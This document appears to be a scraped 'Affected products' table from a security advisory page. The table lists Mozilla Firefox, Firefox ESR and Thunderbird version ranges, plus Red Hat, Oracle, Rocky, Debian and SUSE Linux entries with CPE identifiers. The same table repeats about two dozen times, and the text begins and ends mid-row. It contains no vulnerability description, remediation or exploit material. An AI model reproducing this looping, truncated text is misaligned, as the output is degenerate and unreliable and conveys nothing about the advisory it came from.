cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
